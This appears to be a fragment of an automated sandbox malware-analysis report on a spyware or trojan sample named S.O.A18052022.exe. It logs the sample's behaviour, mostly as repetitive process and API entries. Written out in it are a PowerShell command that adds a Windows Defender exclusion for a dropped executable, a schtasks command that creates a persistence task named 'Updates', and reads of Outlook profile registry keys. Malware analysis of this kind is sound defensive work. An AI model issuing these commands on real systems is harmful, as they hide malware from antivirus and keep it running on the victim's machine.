                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile read: C:\Users\user\Desktop\S.O.A18052022.exeJump to behavior
                    Source: S.O.A18052022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\S.O.A18052022.exe "C:\Users\user\Desktop\S.O.A18052022.exe"
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DIPrtjjfjUpyJ" /XML "C:\Users\user\AppData\Local\Temp\tmp7211.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Users\user\Desktop\S.O.A18052022.exe C:\Users\user\Desktop\S.O.A18052022.exe
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DIPrtjjfjUpyJ" /XML "C:\Users\user\AppData\Local\Temp\tmp7211.tmp
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Users\user\Desktop\S.O.A18052022.exe C:\Users\user\Desktop\S.O.A18052022.exe
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile created: C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exeJump to behavior
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile created: C:\Users\user\AppData\Local\Temp\tmp7211.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/9@2/1
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5172:120:WilError_01
                    Source: S.O.A18052022.exe, Yi/Fe.csCryptographic APIs: 'CreateDecryptor'
                    Source: S.O.A18052022.exe, Yi/Fe.csCryptographic APIs: 'CreateDecryptor'
                    Source: DIPrtjjfjUpyJ.exe.0.dr, Yi/Fe.csCryptographic APIs: 'CreateDecryptor'
                    Source: DIPrtjjfjUpyJ.exe.0.dr, Yi/Fe.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.S.O.A18052022.exe.c30000.0.unpack, Yi/Fe.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.S.O.A18052022.exe.c30000.0.unpack, Yi/Fe.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.S.O.A18052022.exe.c30000.0.unpack, Yi/Fe.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.S.O.A18052022.exe.c30000.0.unpack, Yi/Fe.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.S.O.A18052022.exe.700000.9.unpack, Yi/Fe.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.S.O.A18052022.exe.700000.9.unpack, Yi/Fe.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.S.O.A18052022.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 8.0.S.O.A18052022.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: S.O.A18052022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: S.O.A18052022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: S.O.A18052022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: EnumeratorDropIndi.pdb8n source: S.O.A18052022.exe, DIPrtjjfjUpyJ.exe.0.dr
                    Source: Binary string: EnumeratorDropIndi.pdb source: S.O.A18052022.exe, DIPrtjjfjUpyJ.exe.0.dr

                    Data Obfuscation

                    barindex
                    Source: S.O.A18052022.exe, Yi/Fe.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: DIPrtjjfjUpyJ.exe.0.dr, Yi/Fe.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 0.0.S.O.A18052022.exe.c30000.0.unpack, Yi/Fe.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 0.2.S.O.A18052022.exe.c30000.0.unpack, Yi/Fe.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.S.O.A18052022.exe.700000.13.unpack, Yi/Fe.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.S.O.A18052022.exe.700000.11.unpack, Yi/Fe.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_02F39675 pushad ; retf
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_02F39890 pushad ; retf
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_02F39C7B pushad ; retf
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_055411DD push E9143F5Eh; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_05541B61 push ebx; retf
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628166B push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06281663 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628165F push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_062816AB push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_062816A7 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_062816B7 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628169B push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628169F push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_062817A1 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_062817B9 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06281789 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628179B push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06281793 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_062817EB push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_062817D1 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06281827 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06281833 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628181B push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06281817 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06281863 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06281867 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628187F push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06281873 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06280040 push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_062818AF push es; ret
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_062818BF push es; ret
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.76312278649
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.76312278649
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile created: C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DIPrtjjfjUpyJ" /XML "C:\Users\user\AppData\Local\Temp\tmp7211.tmp
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
